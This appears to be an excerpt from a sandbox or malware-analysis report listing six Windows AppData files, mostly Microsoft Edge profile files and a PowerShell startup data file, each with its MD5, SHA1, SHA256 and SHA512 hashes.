C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 121362540f1f7642f1f0e6104e5a155f
SHA1 1811a2777428c5cfa64346ac2ffd497a924ffa70
SHA256 9b88b6c9c91a753b37e6d294aa428c700269449087c364afceb3416b78a1b932
SHA512 9055cf1fee281e0bb95684c9f510004ecda249309559bb33be696ed0a1b90cbbb94a3b0a4baead1c1744a55dd5f124e06a126d8af3b9688460032ed2d4a5f160

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9285bce6138f87becda2e17594de9b54
SHA1 beb7cce651a0d3f07be9a5a09937f1d17018746f
SHA256 a172954a577d7d5fb6a55fac5c2cc85993d607f9a046b2ce9d10b376d5ddf33f
SHA512 aadd88080e4bac039eed9aaeae4504721109973ed860a0a170fcf801fd40f9d8f80c8e434f2f58f3bac00183fa5929e8728f1bb54319bf126b6fb0c6659ec543

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1fcf61ee4fa5deea9aa3a1f542fc2d9e
SHA1 e7d3c4e8682c25b4be3909197e1f4b536c40e45a
SHA256 c0d40dae93d6e99a0a24a5202431a3a65318664654250933b5f36794f38f6e67
SHA512 018aabba58a98c469ab7d4f7f4731c6d8b7f75ac73211c821b28884604df1e0051c8b2f4e00faa941d220fba26783763f441117e16d1ffec331d7b648090a861

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6f24f15c567493445ea61a73e9020f5d
SHA1 2ac94e8e0814a7ff98692b2c52b244d1e2427709
SHA256 ae17ab7a5d69c203f32e5646ea6efb4ce306661d8d2eec2a2d440733e1503e73
SHA512 200b2f0fdd66fef78b2b9815324127bc5d0c4d37120d915179fd83e0bc05eb73f2e41fb07294c489ed1e79a0a7cd08b1057666adbdf4f326c186cd35b5912ab5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8aa02200844cf81c2cb1983d4003ba1e
SHA1 ffafc9fe86171b14eb2260436f0b635fbbaa5cb4
SHA256 070b1088da2412865dc8d729597f37c930d2cc3c435093574a43859cfeadfdc1
SHA512 3a07e6a2eacb2e49d45af4803af81f9c5f8b6a89222c8f6898249834554bce2a1dd2b8c8a2d51bb67567cf5ec8171bb8d217006191d835b7d62db935f59413c9